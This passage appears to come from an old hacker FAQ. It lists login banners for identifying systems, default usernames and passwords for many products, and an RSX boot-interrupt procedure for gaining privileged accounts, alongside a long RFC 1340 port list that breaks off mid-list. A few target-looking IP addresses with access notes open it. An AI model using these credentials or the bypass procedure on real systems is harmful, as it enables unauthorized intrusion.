128.187.1.2 [need password!] 129.137.33.71 [can't connect] bstorm.bga.com / port=4000 [what is this?] 20. What is this system? AIX ~~~ IBM AIX Version 3 for RISC System/6000 (C) Copyrights by IBM and by others 1982, 1990. login: [You will know an AIX system because it is the only Unix system that] [clears the screen and issues a login prompt near the bottom of the] [screen] AS/400 ~~~~~~ UserID? Password? Once in, type GO MAIN CDC Cyber ~~~~~~~~~ WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978, 1987. 88/02/16. 02.36.53. N265100 CSUS CYBER 170-730. NOS 2.5.2-678/3. FAMILY: You would normally just hit return at the family prompt. Next prompt is: USER NAME: CISCO Router ~~~~~~~~~~~~ FIRST BANK OF TNO 95-866 TNO VirtualBank REMOTE Router - TN043R1 Console Port SN - 00000866 TN043R1> DECserver ~~~~~~~~~ DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1 DPS502-DS700 (c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved Please type HELP if you need assistance Enter username> TNO Local> Hewlett Packard MPE-XL ~~~~~~~~~~~~~~~~~~~~~~ MPE XL: EXPECTED A :HELLO COMMAND. (CIERR 6057) MPE XL: EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424) MPE XL: GTN ~~~ WELCOME TO CITIBANK. PLEASE SIGN ON. XXXXXXXX @ PASSWORD = @ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= PLEASE ENTER YOUR ID:-1-> PLEASE ENTER YOUR PASSWORD:-2-> CITICORP (CITY NAME). KEY GHELP FOR HELP. XXX.XXX PLEASE SELECT SERVICE REQUIRED.-3-> Lantronix Terminal Server ~~~~~~~~~~~~~~~~~~~~~~~~~ Lantronix ETS16 Version V3.1/1(940623) Type HELP at the 'Local_15> ' prompt for assistance. Login password> Meridian Mail (Northern Telecom Phone/Voice Mail System) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MMM MMMERIDIAN MMMMM MMMMM MMMMMM MMMMMM MMM MMMMM MMM MMMMM MMMMM MMM MMM MMM MMMMMM MMMMMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMMMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM Copyright (c) Northern Telecom, 1991 Novell ONLAN ~~~~~~~~~~~~ N [To access the systems it is best to own a copy of ONLAN/PC] PC-Anywhere ~~~~~~~~~~~ P [To access the systems it is best to own a copy of PCAnywhere Remote] PRIMOS ~~~~~~ PRIMENET 19.2.7F PPOA1 ER! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= CONNECT Primenet V 2.3 (system) LOGIN (you) User id? (system) SAPB5 (you) Password? (system) DROWSAP (you) OK, (system) ROLM-OSL ~~~~~~~~ MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47 RELEASE 8003 OSL, PLEASE. ? System75 ~~~~~~~~ Login: root INCORRECT LOGIN Login: browse Password: Software Version: G3s.b16.2.2 Terminal Type (513, 4410, 4425): [513] Tops-10 ~~~~~~~ NIH Timesharing NIH Tri-SMP 7.02-FF 16:30:04 TTY11 system 1378/1381/1453 Connected to Node Happy(40) Line # 12 Please LOGIN . VM/370 ~~~~~~ VM/370 ! VM/ESA ~~~~~~ VM/ESA ONLINE TBVM2 VM/ESA Rel 1.1 PUT 9200 Fill in your USERID and PASSWORD and press ENTER (Your password will not appear when you type it) USERID ===> PASSWORD ===> COMMAND ===> Xylogics Annex Communications Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc. Checking authorization, Please wait... Annex username: TNO Annex password: Permission granted annex: 21. What are the default accounts for XXX? AIX ~~~ guest guest AS/400 ~~~~~~ qsecofr qsecofr /* master security officer */ qsysopr qsysopr /* system operator */ qpgmr qpgmr /* default programmer */ also ibm/password ibm/2222 ibm/service qsecofr/1111111 qsecofr/2222222 qsvr/qsvr secofr/secofr DECserver ~~~~~~~~~ ACCESS SYSTEM Hewlett Packard MPE-XL ~~~~~~~~~~~~~~~~~~~~~~ HELLO MANAGER.SYS HELLO MGR.SYS HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP HELLO OP.OPERATOR MGR CAROLIAN MGR CCC MGR CNAS MGR CONV MGR COGNOS OPERATOR COGNOS MANAGER COGNOS OPERATOR DISC MGR HPDESK MGR HPWORD FIELD HPWORD MGR HPOFFICE SPOOLMAN HPOFFICE ADVMAIL HPOFFICE MAIL HPOFFICE WP HPOFFICE MANAGER HPOFFICE MGR HPONLY FIELD HPP187 MGR HPP187 MGR HPP189 MGR HPP196 MGR INTX3 MGR ITF3000 MANAGER ITF3000 MAIL MAIL MGR NETBASE MGR REGO MGR RJE MGR ROBELLE MANAGER SECURITY MGR SECURITY FIELD SERVICE MANAGER SYS MGR SYS PCUSER SYS RSBCMON SYS OPERATOR SYS OPERATOR SYSTEM FIELD SUPPORT OPERATOR SUPPORT MANAGER TCH MAIL TELESUP MANAGER TELESUP MGR TELESUP SYS TELESUP MGE VESOFT MGE VESOFT MGR WORD MGR XLSERVER Common jobs are Pub, Sys, Data Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote Major BBS ~~~~~~~~~ Sysop Sysop PICK O/S ~~~~~~~~ DSA # Desquetop System Administrator DS DESQUETOP PHANTOM Prolog ~~~~~~ PBX PBX NETWORK NETWORK NETOP Rolm ~~~~ CBX Defaults op op op operator su super admin pwp eng engineer PhoneMail Defaults sysadmin sysadmin tech tech poll tech RSX ~~~ SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM) 1,1/system (Directory [1,1] Password SYSTEM) BATCH/BATCH SYSTEM/MANAGER USER/USER Default accounts for Micro/RSX: MICRO/RSX Alternately you can hit when the boot sequence asks you for the date and create an account using: RUN ACNT or RUN $ACNT (Numbers below 10 {oct} are Priveleged) Reboot and wait for the date/time question. Type ^C and at the MCR prompt, type "abo at." You must include the . dot! If this works, type "acs lb0:/blks=1000" to get some swap space so the new step won't wedge. type " run $acnt" and change the password of any account with a group number of 7 or less. You may find that the ^C does not work. Try ^Z and ESC as well. Also try all 3 as terminators to valid and invalid times. If none of the above work, use the halt switch to halt the system, just after a invalid date-time. Look for a user mode PSW 1[4-7]xxxx. then deposit 177777 into R6, cross your fingers, write protect the drive and continue the system. This will hopefully result in indirect blowing up... And hopefully the system has not been fully secured. System 75 ~~~~~~~~~ bcim bcimpw bciim bciimpw bcms bcmspw, bcms bcnas bcnspw blue bluepw browse looker, browsepw craft crftpw, craftpw, crack cust custpw enquiry enquirypw field support inads indspw, inadspw, inads init initpw kraft kraftpw locate locatepw maint maintpw, rwmaint nms nmspw rcust rcustpw support supportpw tech field Taco Bell ~~~~~~~~~ rgm rollout tacobell Verifone Junior 2.05 ~~~~~~~~~~~~~~~~~~~~ Default password: 166816 VMS ~~~ field service systest utep 22. What port is XXX on? The file /etc/services on most Unix machines lists the activity occurring on each port. Here is the most complete port list in existence, originally presented in RFC 1340: Keyword Decimal Description ------- ------- ----------- 0/tcp Reserved 0/udp Reserved tcpmux 1/tcp TCP Port Service Multiplexer tcpmux 1/udp TCP Port Service Multiplexer compressnet 2/tcp Management Utility compressnet 2/udp Management Utility compressnet 3/tcp Compression Process compressnet 3/udp Compression Process 4/tcp Unassigned 4/udp Unassigned rje 5/tcp Remote Job Entry rje 5/udp Remote Job Entry 6/tcp Unassigned 6/udp Unassigned echo 7/tcp Echo echo 7/udp Echo 8/tcp Unassigned 8/udp Unassigned discard 9/tcp Discard discard 9/udp Discard 10/tcp Unassigned 10/udp Unassigned systat 11/tcp Active Users systat 11/udp Active Users 12/tcp Unassigned 12/udp Unassigned daytime 13/tcp Daytime daytime 13/udp Daytime 14/tcp Unassigned 14/udp Unassigned 15/tcp Unassigned [was netstat] 15/udp Unassigned 16/tcp Unassigned 16/udp Unassigned qotd 17/tcp Quote of the Day qotd 17/udp Quote of the Day msp 18/tcp Message Send Protocol msp 18/udp Message Send Protocol chargen 19/tcp Character Generator chargen 19/udp Character Generator ftp-data 20/tcp File Transfer [Default Data] ftp-data 20/udp File Transfer [Default Data] ftp 21/tcp File Transfer [Control] ftp 21/udp File Transfer [Control] 22/tcp Unassigned 22/udp Unassigned telnet 23/tcp Telnet telnet 23/udp Telnet 24/tcp any private mail system 24/udp any private mail system smtp 25/tcp Simple Mail Transfer smtp 25/udp Simple Mail Transfer 26/tcp Unassigned 26/udp Unassigned nsw-fe 27/tcp NSW User System FE nsw-fe 27/udp NSW User System FE 28/tcp Unassigned 28/udp Unassigned msg-icp 29/tcp MSG ICP msg-icp 29/udp MSG ICP 30/tcp Unassigned 30/udp Unassigned msg-auth 31/tcp MSG Authentication msg-auth 31/udp MSG Authentication 32/tcp Unassigned 32/udp Unassigned dsp 33/tcp Display Support Protocol dsp 33/udp Display Support Protocol 34/tcp Unassigned 34/udp Unassigned 35/tcp any private printer server 35/udp any private printer server 36/tcp Unassigned 36/udp Unassigned time 37/tcp Time time 37/udp Time 38/tcp Unassigned 38/udp Unassigned rlp 39/tcp Resource Location Protocol rlp 39/udp Resource Location Protocol 40/tcp Unassigned 40/udp Unassigned graphics 41/tcp Graphics graphics 41/udp Graphics nameserver 42/tcp Host Name Server nameserver 42/udp Host Name Server nicname 43/tcp Who Is nicname 43/udp Who Is mpm-flags 44/tcp MPM FLAGS Protocol mpm-flags 44/udp MPM FLAGS Protocol mpm 45/tcp Message Processing Module [recv] mpm 45/udp Message Processing Module [recv] mpm-snd 46/tcp MPM [default send] mpm-snd 46/udp MPM [default send] ni-ftp 47/tcp NI FTP ni-ftp 47/udp NI FTP 48/tcp Unassigned 48/udp Unassigned login 49/tcp Login Host Protocol login 49/udp Login Host Protocol re-mail-ck 50/tcp Remote Mail Checking Protocol re-mail-ck 50/udp Remote Mail Checking Protocol la-maint 51/tcp IMP Logical Address Maintenance la-maint 51/udp IMP Logical Address Maintenance xns-time 52/tcp XNS Time Protocol xns-time 52/udp XNS Time Protocol domain 53/tcp Domain Name Server domain 53/udp Domain Name Server xns-ch 54/tcp XNS Clearinghouse xns-ch 54/udp XNS Clearinghouse isi-gl 55/tcp ISI Graphics Language isi-gl 55/udp ISI Graphics Language xns-auth 56/tcp XNS Authentication xns-auth 56/udp XNS Authentication 57/tcp any private terminal access 57/udp any private terminal access xns-mail 58/tcp XNS Mail xns-mail 58/udp XNS Mail 59/tcp any private file service 59/udp any private file service 60/tcp Unassigned 60/udp Unassigned ni-mail 61/tcp NI MAIL ni-mail 61/udp NI MAIL acas 62/tcp ACA Services acas 62/udp ACA Services via-ftp 63/tcp VIA Systems - FTP via-ftp 63/udp VIA Systems - FTP covia 64/tcp Communications Integrator (CI) covia 64/udp Communications Integrator (CI) tacacs-ds 65/tcp TACACS-Database Service tacacs-ds 65/udp TACACS-Database Service sql*net 66/tcp Oracle SQL*NET sql*net 66/udp Oracle SQL*NET bootps 67/tcp Bootstrap Protocol Server bootps 67/udp Bootstrap Protocol Server bootpc 68/tcp Bootstrap Protocol Client bootpc 68/udp Bootstrap Protocol Client tftp 69/tcp Trivial File Transfer tftp 69/udp Trivial File Transfer gopher 70/tcp Gopher gopher 70/udp Gopher netrjs-1 71/tcp Remote Job Service netrjs-1 71/udp Remote Job Service netrjs-2 72/tcp Remote Job Service netrjs-2 72/udp Remote Job Service netrjs-3 73/tcp Remote Job Service netrjs-3 73/udp Remote Job Service netrjs-4 74/tcp Remote Job Service netrjs-4 74/udp Remote Job Service 75/tcp any private dial out service 75/udp any private dial out service 76/tcp Unassigned 76/udp Unassigned 77/tcp any private RJE service 77/udp any private RJE service vettcp 78/tcp vettcp vettcp 78/udp vettcp finger 79/tcp Finger finger 79/udp Finger www 80/tcp World Wide Web HTTP www 80/udp World Wide Web HTTP hosts2-ns 81/tcp HOSTS2 Name Server hosts2-ns 81/udp HOSTS2 Name Server xfer 82/tcp XFER Utility xfer 82/udp XFER Utility mit-ml-dev 83/tcp MIT ML Device mit-ml-dev 83/udp MIT ML Device ctf 84/tcp Common Trace Facility ctf 84/udp Common Trace Facility mit-ml-dev 85/tcp MIT ML Device mit-ml-dev 85/udp MIT ML Device mfcobol 86/tcp Micro Focus Cobol mfcobol 86/udp Micro Focus Cobol 87/tcp any private terminal link 87/udp any private terminal link kerberos 88/tcp Kerberos kerberos 88/udp Kerberos su-mit-tg 89/tcp SU/MIT Telnet Gateway su-mit-tg 89/udp SU/MIT Telnet Gateway dnsix 90/tcp DNSIX Securit Attribute Token Map dnsix 90/udp DNSIX Securit Attribute Token Map mit-dov 91/tcp MIT Dover Spooler mit-dov 91/udp MIT Dover Spooler npp 92/tcp Network Printing Protocol npp 92/udp Network Printing Protocol dcp 93/tcp Device Control Protocol dcp 93/udp Device Control Protocol objcall 94/tcp Tivoli Object Dispatcher objcall 94/udp Tivoli Object Dispatcher supdup 95/tcp SUPDUP supdup 95/udp SUPDUP dixie 96/tcp DIXIE Protocol Specification dixie 96/udp DIXIE Protocol Specification swift-rvf 97/tcp Swift Remote Vitural File Protocol swift-rvf 97/udp Swift Remote Vitural File Protocol tacnews 98/tcp TAC News tacnews 98/udp TAC News metagram 99/tcp Metagram Relay metagram 99/udp Metagram Relay newacct 100/tcp [unauthorized use] hostname 101/tcp NIC Host Name Server hostname 101/udp NIC Host Name Server iso-tsap 102/tcp ISO-TSAP iso-tsap 102/udp ISO-TSAP gppitnp 103/tcp Genesis Point-to-Point Trans Net gppitnp 103/udp Genesis Point-to-Point Trans Net acr-nema 104/tcp ACR-NEMA Digital Imag. & Comm. 300 acr-nema 104/udp ACR-NEMA Digital Imag. & Comm. 300 csnet-ns 105/tcp Mailbox Name Nameserver csnet-ns 105/udp Mailbox Name Nameserver 3com-tsmux 106/tcp 3COM-TSMUX 3com-tsmux 106/udp 3COM-TSMUX rtelnet 107/tcp Remote Telnet Service rtelnet 107/udp Remote Telnet Service snagas 108/tcp SNA Gateway Access Server snagas 108/udp SNA Gateway Access Server pop2 109/tcp Post Office Protocol - Version 2 pop2 109/udp Post Office Protocol - Version 2 pop3 110/tcp Post Office Protocol - Version 3 pop3 110/udp Post Office Protocol - Version 3 sunrpc 111/tcp SUN Remote Procedure Call sunrpc 111/udp SUN Remote Procedure Call mcidas 112/tcp McIDAS Data Transmission Protocol mcidas 112/udp McIDAS Data Transmission Protocol auth 113/tcp Authentication Service auth 113/udp Authentication Service audionews 114/tcp Audio News Multicast audionews 114/udp Audio News Multicast sftp 115/tcp Simple File Transfer Protocol sftp 115/udp Simple File Transfer Protocol ansanotify 116/tcp ANSA REX Notify ansanotify 116/udp ANSA REX Notify uucp-path 117/tcp UUCP Path Service uucp-path 117/udp UUCP Path Service sqlserv 118/tcp SQL Services sqlserv 118/udp SQL Services nntp 119/tcp Network News Transfer Protocol nntp 119/udp Network News Transfer Protocol cfdptkt 120/tcp CFDPTKT cfdptkt 120/udp CFDPTKT erpc 121/tcp Encore Expedited Remote Pro.Call erpc 121/udp Encore Expedited Remote Pro.Call smakynet 122/tcp SMAKYNET smakynet 122/udp SMAKYNET ntp 123/tcp Network Time Protocol ntp 123/udp Network Time Protocol ansatrader 124/tcp ANSA REX Trader ansatrader 124/udp ANSA REX Trader locus-map 125/tcp Locus PC-Interface Net Map Ser locus-map 125/udp Locus PC-Interface Net Map Ser unitary 126/tcp Unisys Unitary Login unitary 126/udp Unisys Unitary Login locus-con 127/tcp Locus PC-Interface Conn Server locus-con 127/udp Locus PC-Interface Conn Server gss-xlicen 128/tcp GSS X License Verification gss-xlicen 128/udp GSS X License Verification pwdgen 129/tcp Password Generator Protocol pwdgen 129/udp Password Generator Protocol cisco-fna 130/tcp cisco FNATIVE cisco-fna 130/udp cisco FNATIVE cisco-tna 131/tcp cisco TNATIVE cisco-tna 131/udp cisco TNATIVE cisco-sys 132/tcp cisco SYSMAINT cisco-sys 132/udp cisco SYSMAINT statsrv 133/tcp Statistics Service statsrv 133/udp Statistics Service ingres-net 134/tcp INGRES-NET Service ingres-net 134/udp INGRES-NET Service loc-srv 135/tcp Location Service loc-srv 135/udp Location Service profile 136/tcp PROFILE Naming System profile 136/udp PROFILE Naming System netbios-ns 137/tcp NETBIOS Name Service netbios-ns 137/udp NETBIOS Name Service netbios-dgm 138/tcp NETBIOS Datagram Service netbios-dgm 138/udp NETBIOS Datagram Service netbios-ssn 139/tcp NETBIOS Session Service netbios-ssn 139/udp NETBIOS Session Service emfis-data 140/tcp EMFIS Data Service emfis-data 140/udp EMFIS Data Service emfis-cntl 141/tcp EMFIS Control Service emfis-cntl 141/udp EMFIS Control Service bl-idm 142/tcp Britton-Lee IDM bl-idm 142/udp Britton-Lee IDM imap2 143/tcp Interim Mail Access Protocol v2 imap2 143/udp Interim Mail Access Protocol v2 news 144/tcp NewS news 144/udp NewS uaac 145/tcp UAAC Protocol uaac 145/udp UAAC Protocol iso-tp0 146/tcp ISO-IP0 iso-tp0 146/udp ISO-IP0 iso-ip 147/tcp ISO-IP iso-ip 147/udp ISO-IP cronus 148/tcp CRONUS-SUPPORT cronus 148/udp CRONUS-SUPPORT aed-512 149/tcp AED 512 Emulation Service aed-512 149/udp AED 512 Emulation Service sql-net 150/tcp SQL-NET sql-net 150/udp SQL-NET hems 151/tcp HEMS hems 151/udp HEMS bftp 152/tcp Background File Transfer Program bftp 152/udp Background File Transfer Program sgmp 153/tcp SGMP sgmp 153/udp SGMP netsc-prod 154/tcp NETSC netsc-prod 154/udp NETSC netsc-dev 155/tcp NETSC netsc-dev 155/udp NETSC sqlsrv 156/tcp SQL Service sqlsrv 156/udp SQL Service knet-cmp 157/tcp KNET/VM Command/Message Protocol knet-cmp 157/udp KNET/VM Command/Message Protocol pcmail-srv 158/tcp PCMail Server pcmail-srv 158/udp PCMail Server nss-routing 159/tcp NSS-Routing nss-routing 159/udp NSS-Routing sgmp-traps 160/tcp SGMP-TRAPS sgmp-traps 160/udp SGMP-TRAPS snmp 161/tcp SNMP snmp 161/udp SNMP snmptrap 162/tcp SNMPTRAP snmptrap 162/udp SNMPTRAP cmip-man 163/tcp CMIP/TCP Manager cmip-man 163/udp CMIP/TCP Manager cmip-agent 164/tcp CMIP/TCP Agent smip-agent 164/udp CMIP/TCP Agent xns-courier 165/tcp Xerox xns-courier 165/udp Xerox s-net 166/tcp Sirius Systems s-net 166/udp Sirius Systems namp 167/tcp NAMP namp 167/udp NAMP rsvd 168/tcp RSVD rsvd 168/udp RSVD send 169/tcp SEND send 169/udp SEND print-srv 170/tcp Network PostScript print-srv 170/udp Network PostScript multiplex 171/tcp Network Innovations Multiplex multiplex 171/udp Network Innovations Multiplex cl/1 172/tcp Network Innovations CL/1 cl/1 172/udp Network Innovations CL/1 xyplex-mux 173/tcp Xyplex xyplex-mux 173/udp Xyplex mailq 174/tcp MAILQ mailq 174/udp MAILQ vmnet 175/tcp VMNET vmnet 175/udp VMNET genrad-mux 176/tcp GENRAD-MUX genrad-mux 176/udp GENRAD-MUX xdmcp 177/tcp X Display Manager Control Protocol xdmcp 177/udp X Display Manager Control Protocol nextstep 178/tcp NextStep Window Server NextStep 178/udp NextStep Window Server bgp 179/tcp Border Gateway Protocol bgp 179/udp Border Gateway Protocol ris 180/tcp Intergraph ris 180/udp Intergraph unify 181/tcp Unify unify 181/udp Unify audit 182/tcp Unisys Audit SITP audit 182/udp Unisys Audit SITP ocbinder 183/tcp OCBinder ocbinder 183/udp OCBinder ocserver 184/tcp OCServer ocserver 184/udp OCServer remote-kis 185/tcp Remote-KIS remote-kis 185/udp Remote-KIS kis 186/tcp KIS Protocol kis 186/udp KIS Protocol aci 187/tcp Application Communication Interface aci 187/udp Application Communication Interface mumps 188/tcp Plus Five's MUMPS mumps 188/udp Plus Five's MUMPS qft 189/tcp Queued File Transport qft 189/udp Queued File Transport gacp 190/tcp Gateway Access Control Protocol cacp 190/udp Gateway Access Control Protocol prospero 191/tcp Prospero prospero 191/udp Prospero osu-nms 192/tcp OSU Network Monitoring System osu-nms 192/udp OSU Network Monitoring System srmp 193/tcp Spider Remote Monitoring Protocol srmp 193/udp Spider Remote Monitoring Protocol irc 194/tcp Internet Relay Chat Protocol irc 194/udp Internet Relay Chat Protocol dn6-nlm-aud 195/tcp DNSIX Network Level Module Audit dn6-nlm-aud 195/udp DNSIX Network Level Module Audit dn6-smm-red 196/tcp DNSIX Session Mgt Module Audit Redir dn6-smm-red 196/udp DNSIX Session Mgt Module Audit Redir dls 197/tcp Directory Location Service dls 197/udp Directory Location Service dls-mon 198/tcp Directory Location Service Monitor dls-mon 198/udp Directory Location Service Monitor smux 199/tcp SMUX smux 199/udp SMUX src 200/tcp IBM System Resource Controller src 200/udp IBM System Resource Controller at-rtmp 201/tcp AppleTalk Routing Maintenance at-rtmp 201/udp AppleTalk Routing Maintenance at-nbp 202/tcp AppleTalk Name Binding at-nbp 202/udp AppleTalk Name Binding at-3 203/tcp AppleTalk Unused at-3 203/udp AppleTalk Unused at-echo 204/tcp AppleTalk Echo at-echo 204/udp AppleTalk Echo at-5 205/tcp AppleTalk Unused at-5 205/udp AppleTalk Unused at-zis 206/tcp AppleTalk Zone Information at-zis 206/udp AppleTalk Zone Information at-7 207/tcp AppleTalk Unused at-7 207/udp AppleTalk Unused at-8 208/tcp AppleTalk Unused at-8 208/udp AppleTalk Unused tam 209/tcp Trivial Authenticated Mail Protocol tam 209/udp Trivial Authenticated Mail Protocol z39.50 210/tcp ANSI Z39.50 z39.50 210/udp ANSI Z39.50 914c/g 211/tcp Texas Instruments 914C/G Terminal 914c/g 211/udp Texas Instruments 914C/G Terminal anet 212/tcp ATEXSSTR anet 212/udp ATEXSSTR ipx 213/tcp IPX ipx 213/udp IPX vmpwscs 214/tcp VM PWSCS vmpwscs 214/udp VM PWSCS softpc 215/tcp Insignia Solutions softpc 215/udp Insignia Solutions atls 216/tcp Access Technology License Server atls 216/udp Access Technology License Server dbase 217/tcp dBASE Unix dbase 217/udp dBASE Unix mpp 218/tcp Netix Message Posting Protocol mpp 218/udp Netix Message Posting Protocol uarps 219/tcp Unisys ARPs uarps 219/udp Unisys ARPs imap3 220/tcp Interactive Mail Access Protocol v3 imap3 220/udp Interactive Mail Access Protocol v3 fln-spx 221/tcp Berkeley rlogind with SPX auth fln-spx 221/udp Berkeley rlogind with SPX auth fsh-spx 222/tcp Berkeley rshd with SPX auth fsh-spx 222/udp Berkeley rshd with SPX auth cdc 223/tcp Certificate Distribution Center cdc 223/udp Certificate Distribution Center 224-241 Reserved sur-meas 243/tcp Survey Measurement sur-meas 243/udp Survey Measurement link 245/tcp LINK link 245/udp LINK dsp3270 246/tcp Display Systems Protocol dsp3270 246/udp Display Systems Protocol 247-255 Reserved pawserv 345/tcp Perf Analysis Workbench pawserv 345/udp Perf Analysis Workbench zserv 346/tcp Zebra server zserv 346/udp Zebra server fatserv 347/tcp Fatmen Server fatserv 347/udp Fatmen Server clearcase 371/tcp Clearcase clearcase 371/udp Clearcase ulistserv 372/tcp Unix Listserv ulistserv 372/udp Unix Listserv legent-1 373/tcp Legent Corporation legent-1 373/udp Legent Corporation legent-2 374/tcp Legent Corporation legent-2 374/udp Legent Corporation exec 512/tcp remote process execution; authentication performed using passwords and UNIX login names biff 512/udp used by mail system to notify users of new mail received; currently receives messages only from processes on the same machine login 513/tcp remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify "authentication domains" who 513/udp maintains data bases showing who's logged in to machines on a local net and the load average of the machine cmd 514/tcp like exec, but automatic authentication is performed as for login server syslog 514/udp printer 515/tcp spooler printer 515/udp spooler talk 517/tcp like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established) talk 517/udp like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established) ntalk 518/tcp ntalk 518/udp utime 519/tcp unixtime utime 519/udp unixtime efs 520/tcp extended file name server router 520/udp local routing process (on site); uses variant of Xerox NS routing information protocol timed 525/tcp timeserver timed 525/udp timeserver tempo 526/tcp newdate tempo 526/udp newdate courier 530/tcp rpc courier 530/udp rpc conference 531/tcp chat conference 531/udp chat netnews 532/tcp readnews netnews 532/udp readnews netwall 533/tcp for emergency broadcasts netwall 533/udp for emergency broadcasts uucp 540/tcp uucpd uucp 540/udp uucpd klogin 543/tcp klogin 543/udp kshell 544/tcp krcmd kshell 544/udp krcmd new-rwho 550/tcp new-who new-rwho 550/udp new-who dsf 555/tcp dsf 555/udp remotefs 556/tcp rfs server remotefs 556/udp rfs server rmonitor 560/tcp rmonitord rmonitor 560/udp rmonitord monitor 561/tcp monitor 561/udp chshell 562/tcp chcmd chshell 562/udp chcmd 9pfs 564/tcp plan 9 file service 9pfs 564/udp plan 9 file service whoami 565/tcp whoami whoami 565/udp whoami meter 570/tcp demon meter 570/udp demon meter 571/tcp udemon meter 571/udp udemon ipcserver 600/tcp Sun IPC server ipcserver 600/udp Sun IPC server nqs 607/tcp nqs nqs 607/udp nqs mdqs 666/tcp mdqs 666/udp elcsd 704/tcp errlog copy/server daemon elcsd 704/udp errlog copy/server daemon netcp 740/tcp NETscout Control Protocol netcp 740/udp NETscout Control Protocol netgw 741/tcp netGW netgw 741/udp netGW netrcs 742/tcp Network based Rev. Cont. Sys. netrcs 742/udp Network based Rev. Cont. Sys. flexlm 744/tcp Flexible License Manager flexlm 744/udp Flexible License Manager fujitsu-dev 747/tcp Fujitsu Device Control fujitsu-dev 747/udp Fujitsu Device Control ris-cm 748/tcp Russell Info Sci Calendar Manager ris-cm 748/udp Russell Info Sci Calendar Manager kerberos-adm 749/tcp kerberos administration kerberos-adm 749/udp kerberos administration rfile 750/tcp loadav 750/udp pump 751/tcp pump 751/udp qrh 752/tcp qrh 752/udp rrh 753/tcp rrh 753/udp tell 754/tcp send tell 754/udp send nlogin 758/tcp nlogin 758/udp con 759/tcp con 759/udp ns 760/tcp ns 760/udp rxe 761/tcp rxe 761/udp quotad 762/tcp quotad 762/udp cycleserv 763/tcp cycleserv 763/udp omserv 764/tcp omserv 764/udp webster 765/tcp webster 765/udp phonebook 767/tcp phone phonebook 767/udp phone vid 769/tcp vid 769/udp cadlock 770/tcp cadlock 770/udp rtip 771/tcp rtip 771/udp cycleserv2 772/tcp cycleserv2 772/udp submit 773/tcp notify 773/udp rpasswd 774/tcp acmaint_dbd 774/udp entomb 775/tcp acmaint_transd 775/udp wpages 776/tcp wpages 776/udp wpgs 780/tcp wpgs 780/udp hp-collector 781/tcp hp performance data collector hp-collector 781/udp hp performance data collector hp-managed-node 782/tcp hp performance data managed node hp-managed-node 782/udp hp performance data managed node hp-alarm-mgr 783/tcp hp performance data alarm manager hp-alarm-mgr 783/udp hp performance data alarm manager mdbs_daemon 800/tcp mdbs_daemon 800/udp device 801/tcp device 801/udp xtreelic 996/tcp XTREE License Server xtreelic 996/udp XTREE License Server maitrd 997/tcp maitrd 997/udp busboy 998/tcp puparp 998/udp garcon 999/tcp applix 999/udp Applix ac puprouter 999/tcp puprouter 999/udp cadlock 1000/tcp ock 1000/udp blackjack 1025/tcp network blackjack blackjack 1025/udp network blackjack hermes 1248/tcp hermes 1248/udp bbn-mmc 1347/tcp multi media conferencing bbn-mmc 1347/udp multi media conferencing bbn-mmx 1348/tcp multi media conferencing bbn-mmx 1348/udp multi media conferencing sbook 1349/tcp Registration Network Protocol sbook 1349/udp Registration Network Protocol editbench 1350/tcp Registration Network Protocol editbench 1350/udp Registration Network Protocol equationbuilder 1351/tcp Digital Tool Works (MIT) equationbuilder 1351/udp Digital Tool Works (MIT) lotusnote 1352/tcp Lotus Note lotusnote 1352/udp Lotus Note ingreslock 1524/tcp ingres ingreslock 1524/udp ingres orasrv 1525/tcp oracle orasrv 1525/udp oracle prospero-np 1525/tcp prospero non-privileged prospero-np 1525/udp prospero non-privileged tlisrv 1527/tcp oracle tlisrv 1527/udp oracle coauthor 1529/tcp oracle coauthor 1529/udp oracle issd 1600/tcp issd 1600/udp nkd 1650/tcp nkd 1650/udp callbook 2000/tcp callbook 2000/udp dc 2001/tcp wizard 2001/udp curry globe 2002/tcp globe 2002/udp mailbox 2004/tcp emce 2004/udp CCWS mm conf berknet 2005/tcp oracle 2005/udp invokator 2006/tcp raid-cc 2006/udp raid dectalk 2007/tcp raid-am 2007/udp conf 2008/tcp terminaldb 2008/udp news 2009/tcp whosockami 2009/udp search 2010/tcp pipe_server 2010/udp raid-cc 2011/tcp raid servserv 2011/udp ttyinfo 2012/tcp raid-ac 2012/udp raid-am 2013/tcp raid-cd 2013/udp troff 2014/tcp raid-sf 2014/udp cypress 2015/tcp raid-cs 2015/udp bootserver 2016/tcp bootserver 2016/udp cypress-stat 2017/tcp bootclient 2017/udp terminaldb 2018/tcp rellpack 2018/udp whosockami 2019/tcp about 2019/udp xinupageserver 2020/tcp xinupageserver 2020/udp servexec 2021/tcp xinuexpansion1 2021/udp down 2022/tcp xinuexpansion2 2022/udp xinuexpansion3 2023/tcp xinuexpansion3 2023/udp xinuexpansion4 2024/tcp xinuexpansion4 2024/udp ellpack 2025/tcp xribs 2025/udp scrabble 2026/tcp scrabble 2026/udp shadowserver 2027/tcp shadowserver 2027/udp submitserver 2028/tcp submitserver 2028/udp device2 2030/tcp device2 2030/udp blackboard 2032/tcp blackboard 2032/udp glogger 2033/tcp glogger 2033/udp scoremgr 2034/tcp scoremgr 2034/udp imsldoc 2035/tcp imsldoc 2035/udp objectmanager 2038/tcp objectmanager 2038/udp lam 2040/tcp lam 2040/udp interbase 2041/tcp interbase 2041/udp isis 2042/tcp isis 2042/udp isis-bcast 2043/tcp isis-bcast 2043/udp 